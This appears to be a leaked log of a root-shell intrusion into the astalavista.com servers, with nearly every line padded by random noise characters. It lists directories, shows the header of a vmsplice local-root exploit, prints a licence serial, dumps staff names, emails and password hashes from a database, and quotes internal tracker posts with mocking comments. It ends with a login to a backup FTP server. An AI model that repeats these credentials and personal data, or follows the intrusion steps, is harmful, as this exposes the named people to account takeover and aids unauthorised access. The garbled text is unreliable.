sh-3.2# ls -la' B* c: x9 A" U/ c+ k+ d
total 141208
9 J# Z+ T8 j' w/ \8 q( adrwx–x–x 10 com com 4096 Apr 28 12:40 .; f7 Y/ Y) R2 ]3 N# g/ @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..9 c9 a" }# r/ W" h
drwx—— 2 com com 4096 Jun 4 04:04 backups$ r1 Y, ]5 D/ G! y- A' h9 |' T
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
6 v3 I# ^0 f* l+ Zdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
) P$ W7 g1 |3 u0 r$ N* d-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
! A1 f+ b3 v7 C( C1 Z; P" z-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
2 u1 Z: e" C" @* {& z( L5 R-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
* E/ D- |' R( ^2 }; {, S-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc# `" ^7 q4 ?; Q5 Z" e
drwx–x–x 3 com com 4096 Jan 29 2008 domains
& ^7 k# s+ L& D) i-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
% n, V1 W9 e6 Ydrwxrwx— 3 com mail 4096 Jan 6 19:24 imap
% r! {, B! Q, w7 P-rw——- 1 com com 69 Nov 18 2008 .lesshst
" c$ a) K% U2 n @- adrwx—— 2 com com 4096 Sep 24 2007 mail
% E5 F* o4 ^% X3 h. c-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history* a; ^: G x, r" Q3 \
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp. ^& M+ T7 m8 E" O; h
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html5 b: ?- n6 L9 S3 j" c
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
: R! K. E0 b- [! M3 L& gdrwx—— 2 com com 4096 Aug 26 2008 .ssh
8 A2 k$ M+ J# X- ? b-rwx—— 1 com com 8515 Feb 10 2008 t6 p( a0 L) s& m# H; d
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c* |" h$ U1 K* I. B7 N7 W: p+ k
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
! Q! w# g- t, {. L' V p-rw-rw-r– 1 com com 617 May 20 2008 .toprc
3 M5 x4 m8 W: ?" V-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
Z; T I1 @& p& t2 J8 f- F-rw——- 1 com com 16629 Mar 28 21:46 .viminfo% F0 Y5 J2 K6 c+ O$ X. H
-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc
3 t8 y- v: p8 @* [
& c% w6 W R5 O1 d% K6 p, gsh-3.2# head t.c
N+ Z3 c& D$ u0 g1 P; M/*; u' y/ u2 R! q
* jessica_biel_naked_in_my_bed.c. p1 F$ L. u' P7 y- e* M; r
*
+ T0 b' C, @# Q8 F* T) D* r* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
# o+ y5 B! X5 C5 p, ] h* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
g: ]3 I) {4 e) l, w* Stejnak je to stare jak cyp a aj jakesyk rozbite.+ j# H! R$ B& y* U D3 N
*
& _" U% z$ C1 `; s' ?$ c1 v! J1 Y* Linux vmsplice Local Root Exploit
7 }, Q, p( W, n% ~: T2 g* By qaaz: ]: @- F8 N2 L) v4 ?
*1 ]4 x) N4 o; ^2 M3 y
9 s/ W6 c5 r6 k/ b% q5 ?6 _sh-3.2# cd /
4 i" X% d6 j7 T- B- v1 Z& Hsh-3.2# ls -la
5 u1 d. r5 L* G' I) L& ?, jtotal 360
4 X2 G* _$ u* _. D% |- h sdrwxr-xr-x 25 root root 4096 Jun 3 02:43 .
8 g" t9 _" h0 J) @) B. M! Xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..0 [9 r! N: V6 F6 m, h( C$ l
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group! u; W% Q: J. Q( e! `3 v2 J" ^( R
-rw——- 1 root root 10240 Jun 3 02:39 aquota.user
- d- H& L8 G2 ?# ?/ y0 l8 |1 `-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
, k0 @: z) G( w-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck0 o6 ?, I9 Y) u& I
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel: B8 C( l0 ^, y# E- S; q
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
# a# a3 I0 R q9 vdrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
2 Q' i2 x' Z6 K7 Sdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
; l3 @7 L8 r# I. ]: s# Xdrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev# d3 ^/ j" t/ k, O' M# M. E
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc
% j/ y( k' m+ R7 W$ Ndrwxr-xr-x 14 root root 4096 Mar 11 17:56 home( g& z+ P8 `2 y$ d5 E1 ^
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf0 `, Y6 r( ~) \) _' W4 \
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
! q/ ?. W2 d# E; B5 X; j/ W& r% P+ rdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64: E2 d! F; E" s# }$ {* S
drwx—— 2 root root 16384 Sep 11 2007 lost+found6 L6 x8 o9 b5 h) Y/ c
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media- q9 M7 c/ [% A5 u' `9 z/ z
drwxr-xr-x 2 root root 0 Jun 3 02:43 misc6 R" z+ Q. F, T+ G- c6 D
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt( ^8 U) f7 X& K# R* r5 P- }: f: l: b0 N
-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
: r5 \& c' }2 v! Q6 F2 b- h' ] tdrwxr-xr-x 2 root root 0 Jun 3 02:43 net8 ^/ |; A/ z5 o* @
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt$ n' Z7 F! b) h6 n D: ?
dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
, j( |; p! Z' D) w; Y5 B. edrwxr-x— 15 root root 4096 Jun 4 08:40 root) E) M. v" N, Z5 f
drwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
5 Y: T- n8 p( sdrwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
1 b& G: T- Z9 }9 e' G) s' d0 gdrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv- X W$ A' u9 ]$ I
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys. e& R& K; X/ W5 \8 N6 P( @3 Y
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
- Z4 s& |! Q6 M& A. kdrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
0 f5 }* n" ?0 H9 T2 w4 Zdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
" s, ]4 v* i+ _% i, D
! E( V# g9 B2 }! ^- ?& ^9 s0 Y, Lsh-3.2# cd opt' z) |! p* H- i" |
sh-3.2# ls -la
; T0 W# I- c9 _2 C. Ttotal 20
) i0 y5 g$ a ?5 ? Y/ T; ]drwxr-xr-x 3 root root 4096 Mar 11 17:56 .- f& |& [ ?: |$ O* H; L( j2 h
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
5 w5 m, h% w8 ?1 U- j& ^drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws6 z$ i2 l8 i& S7 Q7 e
% _0 g& t2 i a4 V& X) e1 esh-3.2# cd lsws/% _( A! [, }. D7 @
sh-3.2# ls -la
" f5 D* k* `6 ~% s1 W: q' vtotal 108$ d: h8 R: `, y
drwxr-xr-x 15 root root 4096 Mar 20 2008 .7 @% z; F0 H/ v0 i
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
( `, Z" n% E" t) U ]drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
$ \5 P. E7 M- o1 t) u" zdrwxr-xr-x 13 root root 4096 May 29 15:10 admin4 Q3 D$ G7 f8 [: b- ?- h: }4 u% {
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
) s8 u6 |1 E* B y' Ndrwxr-xr-x 2 root root 4096 May 29 15:10 bin0 q4 n) K- K; }6 T, E \$ V0 L
drwx—— 4 apache apache 4096 Jun 3 02:43 conf; O- M9 }0 J0 d2 B1 s0 L
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
7 ~, R) k9 b3 ^# C6 p. m9 Wdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs: w: r* D, w, I S1 r6 T
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin
J \, l4 I7 A" d; l+ |% Xdrwxr-xr-x 2 root root 4096 Sep 15 2008 lib5 W" S Y3 [; T8 w& a5 e0 r7 s d+ \
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
3 s. T5 @5 o" _9 c, p& E-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP
, @0 t! e" T# x-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL0 i, e0 Y6 U3 D( b! C, N
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
) l N$ a$ P. V8 m2 kdrwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
( ]2 B$ X" B0 Q# c" R/ ldrwxr-xr-x 2 root root 4096 Mar 20 2008 php
3 b8 c5 u2 s, j( }$ A& ~5 `drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild c5 W7 t0 w$ Q# `2 G, C9 q
drwxr-xr-x 3 root root 4096 Mar 20 2008 share
9 r" Z: b" F7 _# ?0 Z2 t-rw-r–r– 1 root root 6 May 29 15:10 VERSION
8 X! x3 S! u; O2 a$ ^
* x/ p& Q7 c' Hsh-3.2# cd conf
[! K9 C8 z* Y7 o0 r, psh-3.2# ls -la2 F7 i: A# ^8 x9 }1 K- f3 w
total 48; o) v" c$ x* F
drwx—— 4 apache apache 4096 Jun 3 02:43 .
6 B8 F% I+ m+ K: S/ k1 p" edrwxr-xr-x 15 root root 4096 Mar 20 2008 ..
+ }* W7 Q9 U; R5 Rdrwx—— 2 apache apache 4096 Mar 20 2008 cert& h. h: z1 p4 r
-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
1 ^% p4 t8 z1 H7 U6 b8 G5 K-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak5 @( b1 }/ C j5 ~
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
, {# l6 V$ e7 N-rw——- 1 apache apache 256 May 29 15:10 license.key
' T4 T- D" G: c- F6 n ? Q-rw——- 1 apache apache 256 Mar 21 2008 license.key.old0 \ n) R* ~( Z4 s4 s. o
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties- L0 y% t' ` q- _* m
-rw——- 1 apache apache 20 May 29 15:10 serial.no+ u" V) Z4 |# u$ ]: N
drwx—— 2 apache apache 4096 Mar 20 2008 templates
$ z9 O% ] R6 s; ~' S: b+ }1 v: Y, C ^+ @
sh-3.2# cat serial.no9 X& P) |9 i# _8 S- S ]9 D1 L
IbDl-oVsO-CKqL-wVRa
& c. ^4 w# C* N; {9 m
$ y. j* ?% t3 J, r$ d7 Z# P: z: ish-3.2# mysql8 Z; [% O% y+ O( H0 g
Welcome to the MySQL monitor. Commands end with ; or \g.
/ \! d7 j" d8 @# c H0 r5 lYour MySQL connection id is 286844
1 o8 H& x1 S' ~1 W- QServer version: 5.0.45-community-log MySQL Community Edition (GPL)/ y2 l* \( y; ^1 H0 M* m' w
. J3 S. S4 f! R9 x# `$ r8 rType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
- X7 m C1 U/ b G ~! J' j8 k" H, a/ e; q, c7 J
mysql> show databases;
' U# ~0 d, h: T( h5 C* [+———————–+
1 B" N- t; F/ e) J) Q6 D/ P1 ~| Database | I8 D7 c9 W$ X5 J% ?3 t9 I& p
+———————–+
0 S7 }" t# y/ m: t| information_schema |) \6 r. W h, O$ C& O i
| astanet_ads |0 k! \$ z( H* i- V0 g- E/ q. [
| astanet_mailing_lists |
# I# l" x0 _+ G5 g/ u# y6 W. F| astanet_mediawiki |. a9 M4 g) M! `3 u8 y
| astanet_membersystem |
0 d; { }+ j% I6 x/ [| com_contrexx |. m) C( i& n5 o. j+ U3 Y5 p2 l
| com_contrexx2 |
% s( Y" ^0 A+ }" s, h8 ^3 L2 P| com_contrexx2_live |' a, F- F; t4 u8 g3 }
| da_roundcube |
3 \+ _5 c" L1 c# i| dolphin |( ^- e& A0 W6 C/ O0 O9 @8 U
| ideapool |% q, q% z5 A$ X& M
| mysql |
* T; u- o5 n8 e+ H) j& V* l8 j" ^| test |& O; I, w0 _% f- C2 x
| yourmaster |9 g7 ~4 J3 O4 g+ }& w3 I
+———————–+; C- |" o( Y' @$ y- [/ @4 \! R* P
14 rows in set (0.00 sec); ^% O; V# N1 @4 Z( {+ E. |- ?
7 u7 u1 I. L3 z" z+ R2 e
mysql> use ideapool0 N8 Y, q6 q' \6 l
Database changed
& R$ X& c# ~0 o8 [# n4 l ^mysql> show tables;
. n: O; ~6 ?9 q- H, {* @) Q/ Y9 F+———————————–+8 ~( |/ P; {1 y+ M7 W8 G) z
| Tables_in_ideapool |% X, A/ g9 ~* v# K7 y) C
+———————————–+8 u' `2 P# y0 Y- c7 c/ _- j7 Q/ c% h
| eventum_columns_to_display |
% v* t* ]/ z( g B7 p| eventum_custom_field |4 I6 ?! M) m: K* O: P' S; Z! L
| eventum_custom_field_option |
+ \( A$ J4 B9 S( u1 E0 v) Y| eventum_custom_filter |
" Y- W, @% ~* r) {| eventum_customer_account_manager |! i3 f; U+ @+ }0 ^
| eventum_customer_note |* w P, ?) c3 S ?2 M+ y* g
| eventum_email_account |' e7 n. y; A% G/ U# i8 Q9 i$ @
| eventum_email_draft |' [ l0 J( d7 r z# j# ]- g
| eventum_email_draft_recipient |) S7 [. p4 E& ^( X w
| eventum_email_response |4 H/ u Q# I0 h4 M$ O
| eventum_faq |/ [ z s4 `# Q9 h2 ^1 O8 `9 T6 H- t
| eventum_faq_support_level |
+ u$ w6 e- c' _5 x| eventum_group |
) i, E2 Z5 u, p# u; r| eventum_history_type |! u% |( f+ o, g+ C
| eventum_irc_notice |
& M$ ^ K, M% M2 \/ C| eventum_issue |
4 w( O2 s2 B0 w| eventum_issue_association |
; o: f9 h7 W) c' t| eventum_issue_attachment |! v" r6 i6 c5 u' q" J& s- C5 \
| eventum_issue_attachment_file |& F3 ~" `5 X( T' m* X/ C- p
| eventum_issue_checkin |" c4 f7 h$ S; i) N* v
| eventum_issue_custom_field |
) \ ^: T0 v" s" W6 ~$ K| eventum_issue_history |; p) H4 P6 |0 s- Q' G
| eventum_issue_quarantine |
& d# x0 [1 M0 r| eventum_issue_requirement |
8 Y6 B& |; ^2 b, Z| eventum_issue_user |3 l. k# o8 P e' I/ d# H
| eventum_issue_user_replier |
" A g9 w; O3 ]( v' T| eventum_link_filter |
" [3 w3 U J; @" q% }| eventum_mail_queue |, n" W$ s) X' B: G
| eventum_mail_queue_log |7 ]) e) d5 ?9 G' \( s
| eventum_news |1 `% y8 N5 ~- i' m) e6 h O" c
| eventum_note |
4 T, D" O0 S! B| eventum_phone_support |
% r8 N- \/ ~" ]: _8 u| eventum_project |; b7 c g) v6 U: A3 {
| eventum_project_category |
, Z0 I9 e7 [" _8 f( X8 r4 V| eventum_project_custom_field |$ m) U7 k; }2 r5 [: x: ? l ^
| eventum_project_email_response |, J$ Y# I' S s' W d
| eventum_project_field_display |) f1 @2 [/ f& [, e
| eventum_project_group |7 I, I( R0 @* i& o8 Z
| eventum_project_link_filter |2 x! W6 y/ v9 {
| eventum_project_news |
5 j3 M, |2 X8 H z" b! z| eventum_project_phone_category |
- \) x9 r. K8 {8 R0 ^! ?+ q| eventum_project_priority |$ l! ~. t7 H- |4 W* t" m
| eventum_project_release |
& W- l F) u5 Q# y: s, H/ ]| eventum_project_round_robin |
: _/ _8 Y/ v5 `; k, ?| eventum_project_status |$ c9 M* O2 {( a) t( E) V$ Y
| eventum_project_status_date |& Q3 W4 H4 ?) k5 U4 D. M" E9 J. E y
| eventum_project_user |- F+ }+ ?& ]5 r* y1 D$ r# {. {' P0 F
| eventum_reminder_action |% B# d& j+ \' b& S
| eventum_reminder_action_list |
; ~! g& [# C A' x# X. Y| eventum_reminder_action_type |
( L% {2 s' u* |0 {1 p! H1 H| eventum_reminder_field |9 q) X7 v& ~7 Y5 N; j* a; J% b- ]
| eventum_reminder_history |
$ V% F+ t- F; A" g% [0 D+ q| eventum_reminder_level |; B) L$ I$ d$ V
| eventum_reminder_level_condition |( k$ ~) ]( Q% M5 }0 {
| eventum_reminder_operator |! _+ W( O1 R9 f7 J" _
| eventum_reminder_priority |+ [ R9 r4 o7 w {+ _5 F; w
| eventum_reminder_requirement |- B4 S" H. J( k' _. j4 w# e
| eventum_reminder_triggered_action |* M+ G4 j; X0 Y( q" ~
| eventum_resolution |
7 a7 I0 E1 T* E( I* ]2 n| eventum_round_robin_user |0 n" M3 ~0 t- t
| eventum_search_profile |) A) c5 @* P, |
| eventum_status |6 ~3 X" `* p8 K" g: n
| eventum_subscription |* E# n3 b* H! [, p2 a8 ]7 E! l
| eventum_subscription_type |! e) h4 _ p }+ H
| eventum_support_email |
( O7 Z! A% h9 ]/ c| eventum_support_email_body |
$ {7 n6 c, n, N8 l6 P1 `| eventum_time_tracking |1 A" z& [' i. v6 t! |$ D5 h; z
| eventum_time_tracking_category |
2 C- Z( h2 f! I$ }# Q| eventum_user |0 P: s; a( b" e3 I9 M
+———————————–+8 F* s# q2 i: D- q
69 rows in set (0.00 sec)8 A0 W, R. ?5 L. }* ~2 }' c
9 d9 P1 p0 _. a8 i0 `' T
mysql> describe eventum_user;8 d0 w% t; S! x. ~/ v( a% r
+————————-+——————+——+—–+———————+—————-+/ t/ |7 v/ {0 R: B
| Field | Type | Null | Key | Default | Extra |
0 l; J6 h# o! b$ A8 t+————————-+——————+——+—–+———————+—————-+
2 O6 i5 Q: H, P- D/ ], n! m. K9 r| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |# i7 T+ K9 u: o9 e
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |! a9 n& }! H9 E8 @
| usr_customer_id | int(11) unsigned | YES | | NULL | |8 j) V% ]4 U% g9 G& Y, z$ ~
| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
) Y7 a6 U1 I3 y$ J n| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |# F: o' v3 F6 t( Q+ b: L; n7 T( r- i
| usr_status | varchar(8) | NO | | active | |
% ?8 U; \9 i( D7 ?) W| usr_password | varchar(32) | NO | | | |
: L* v. t4 u' M9 Q' X4 H/ f' w3 v( M& c| usr_full_name | varchar(255) | NO | | | |5 a# Y" H0 c w: }% d
| usr_email | varchar(255) | NO | UNI | | |4 M- L( u$ I( Z2 m% v! r
| usr_preferences | longtext | YES | | NULL | |/ ?3 n5 D, U9 x8 \% h( A H
| usr_sms_email | varchar(255) | YES | | NULL | |9 q5 Q+ i7 ?8 [
| usr_clocked_in | tinyint(1) | YES | | 0 | |$ }! Y0 x( r( \
| usr_lang | varchar(5) | YES | | NULL | |8 D# u5 f5 s! ?' g7 u
+————————-+——————+——+—–+———————+—————-+
* y2 V! ~: G4 p4 X6 { ~; B: k13 rows in set (0.00 sec)
$ J+ \9 n2 s$ {$ m J: I2 @& g5 }0 L
# }. }2 p, d/ m/ b9 Q3 cmysql> select usr_full_name,usr_email,usr_password from eventum_user;* l. Z) t- N) U6 W/ Z
+———————-+——————————-+———————————-+
* ~6 t5 l8 i! z, a+ P* V, b8 h, y/ m$ S| usr_full_name | usr_email | usr_password |
. _# C$ n/ M: N- q. [% M) l3 ^9 }9 [+———————-+——————————-+———————————-+
" M1 O" s4 B) E: I" h, ^) z) `1 A+ f| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
1 z0 G: l+ z: F. n| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |. [, a, c8 d, A6 X: D% h$ U7 O
| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |
) r c5 ], ?7 W4 p* g& G6 U: `3 Q5 i| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |
B! y. k" m+ S. J Z+ m6 O| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
" v! m: C, n1 z6 W6 X# ~) u| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |; U! s6 l$ N6 {; c" I9 R! h
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |- N* l+ z w9 ]$ C8 g
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
8 R F( K! w2 ~) ]; n| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |
! }% x& N) R/ V0 u7 I7 k$ |5 Y' F5 ^| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |( f+ b. |) B% j
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |- Q; ^ N- H" V3 L8 T& w7 e4 h
| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |
4 A+ `" k; y/ i| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
4 n) e3 a4 ]. X) v' G/ ~2 k| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |# D0 V$ o+ C' u, c3 O# X' o: f
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |0 r3 t o- u( V9 Y
+———————-+——————————-+———————————-+
0 K5 B2 C) M4 ^& Y& H15 rows in set (0.00 sec)
3 m1 S9 I6 {, k! a9 G& x% j1 L% A2 A& |. S$ J& ^( X% r
mysql> select iss_description from eventum_issue where iss_id = 43;* n( z& m ?$ q/ i" S9 R2 u9 z
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
6 b4 c/ F% N% |1 i4 o. ~0 k| iss_description
: V. s0 M3 u$ V3 Y( w8 z3 P9 r& n& X|
" _# I; s% |- ~! ?( n3 u* @" V+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 Z, k! c1 z9 M3 I6 F
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
, B0 [/ h: j4 N! G1 kconnected for 90 mins… 120mins… so what i propose is something like:) x% `, J1 J9 T0 C
链接标记[url]http://www.surfthechannel.com/[/url]
- v; Q! y* _) k9 a. rsince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system
+ d0 r# c7 r& F& elike podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t3 p5 P$ O3 H, E) i: n" e! d
break any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off, B6 X% {/ D& ?0 M+ I4 p
if they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
' P' b7 V5 Q! i
% @# o5 O0 D. TWe could also put advertisement during play on the flash video player itself… extra $$…7 D9 m( X# }9 Q* R: N1 M: ?
o4 u o. L8 z8 }0 v |; J) \
By sykadul |
% n. }7 E, o8 h U" H, r" t% \$ ~: @+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
# U( [; W# g( {0 ^0 H1 row in set (0.00 sec) V+ ~ C1 u$ l: E. W7 g
# k$ U" b+ `' S5 T. H! ]! B
// Money and extra $$ is all they care about. remember that.
- a$ J1 r/ a1 J& `+ P& Q; M5 s+ D/ j( k* s7 p6 d. `. g! K( g& L
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;8 W& j9 W0 I- e
+————————+——————————————————————————————————————————————————————————————————————————————-++ A; A; d; P5 Y) z! f
| iss_summary | iss_description % p( l2 R# @8 _ A) p
|6 ~; D) y9 {; D* S; g" d
+————————+——————————————————————————————————————————————————————————————————————————————-+) Z+ o& \4 K( ~; Y
| Forum for REAL EXPERTS | Hello," R. f6 [, I6 |; ^
7 n2 h% @. H0 S" `9 J pIshtus and I,6 o0 p6 U+ x' L4 v$ N0 w5 A
! w6 W8 F6 e# d( Y: U v8 L- u6 ?! R
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
" [0 G$ M- S1 J5 WONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..5 r7 h! l: P" S! O2 `, M: Q7 Y7 G) W
# |- G& ?3 N; O2 @& r1 v+ W. u
One example a friend of mine from coresecurity.com!' {* I3 S b" h' F4 @( W
& _8 J' ^! d& i7 I/ ~We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..7 y/ R6 _% f5 U: R
& o; Y: i6 l4 u8 e2 x$ P2 I! r9 I|: [1 t$ N; O5 U% |4 z
+————————+——————————————————————————————————————————————————————————————————————————————+
7 \# f/ p* Y1 r5 G; C5 X9 [$ Z1 row in set (0.00 sec)6 P" T" l+ E; o( F$ z+ H
' G% F# l6 b* j5 Y// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs… F- `1 Q* ~+ u0 ^# @4 U
: w8 h( K0 V: p7 n/ u
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;5 m7 {, H# i6 \& Q5 u
+——————+———————————————————————————————+
9 z# |& \+ m6 g3 m' e- H| iss_summary | iss_description |
; d+ y) M& Q1 {# [: Z+——————+———————————————————————————————+
+ M5 g: ?2 I z$ R: U| Website guidance | Virtual Girl which guides you trought the website.
9 U4 E9 b* J- ]- {
" p. A3 i( Y, V# S. U0 |) ~We need a girl with who you can ( talk )!!!" _1 R }) J- B6 ~) `
Also for the News!
$ W* ~3 k& P I& ?, [2 f& n5 uSo my suggestion is a girl who read you the news loud if you like!
* ]! e9 |2 j3 O( Y) Ryou can choose between read yourselfe or she read it for you or both!
/ Y/ S+ w: d4 R `% k$ f! L4 X
- V) i* m5 h# RGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!5 v I/ R! O, ^/ b
/ C8 n9 {! z' h* R. R0 QHave a look on the example girls!!. K/ M7 `5 M4 r. `: I; l2 i0 p4 \
: a0 W/ N' B# @5 l链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url] o$ T5 l; H, h& b3 ]+ _' f
* b7 ^. [9 o& v& q2 B: p M# A% ], |
or that7 c) p6 U! [+ b
* e- E+ r1 p" Z9 ]+ _0 r% Q a链接标记[url]http://www.yellostrom.de/[/url]: d( @7 d: F) R' H( T4 L3 z7 M
5 n) A) L5 J& s" h! |/ \' \|
' \: B. X3 g0 t+——————+———————————————————————————————+2 ?/ P% i! N6 B: d3 ^* L$ U
1 row in set (0.00 sec)
) k% N4 x6 E: f2 K
' R1 \/ n7 d6 a1 x4 P// ha ha.
4 {( l1 L7 a6 O" t) _# c# ^+ \
% l6 M Q" ?" ~5 Q8 r' Amysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;; q) `/ [' C( }+ d/ V" x
+————————–+———————————————————————————————————–+- s8 f: D6 f& |, C% X6 h
| iss_summary | iss_description |
3 k9 U5 R' c7 U6 Z' b" X& Q+————————–+———————————————————————————————————–+
9 ~7 {# b- @% D; ^$ l% h/ D| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |. _) }) Y% _0 q/ o2 {/ r: O
+————————–+———————————————————————————————————–+
) M; p" m, E: {% H1 r0 o1 row in set (0.00 sec)
! v0 s$ |( B8 J7 A# {
+ z C: n5 x7 M- G// LOL.
! X* _7 `9 S+ Z5 u5 n$ W) R
/ z, q. l0 j; r7 \8 K6 y, Q: Dmysql> exit
4 a$ Q- ^3 m8 O8 K1 l: bBye
9 j9 @: A( ~ a2 K. t* X9 b. |$ z. R/ |2 \0 b/ v, t- c/ o1 G
sh-3.2# ftp 212.254.194.163* ?6 N$ C! h% w+ U0 Y
Connected to 212.254.194.163.( d' t/ b1 e8 r& K5 l
220 BackupCOM_VW FTP server ready.+ m+ U6 i: m. q( W
504 AUTH: security mechanism ‘GSSAPI’ not supported. N6 U" X7 X% _# v# u
504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
: w; I8 G- _# N6 sKERBEROS_V4 rejected as an authentication type3 k( u. @. d# c" d% d- g* ^
Name (212.254.194.163:root): astalavista.com
/ K, E0 ~4 k" r, ?- A3 g6 f1 ]331 Password required for astalavista.com.- x0 a: _! X8 `7 _6 E% h+ |& S
Password:
: k/ S. e( Y$ b5 u0 e# V h230 User astalavista.com logged in.
f, J! y6 }! G0 `Remote system type is UNIX.4 h+ ~: J* d- l; m. A q
Using binary mode to transfer files.8 i, i$ z: S- f" G
ftp> ls -la3 P% E5 ^* w* }6 E9 X3 n) d J2 w, |$ g
227 Entering Passive Mode (212,254,194,163,2,188)
6 Q1 N* }3 K% l" d150 Opening BINARY mode data connection for ‘file list’.8 R+ ~; m. T% ^
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com; @ s6 m* |0 J @ F+ F5 ^
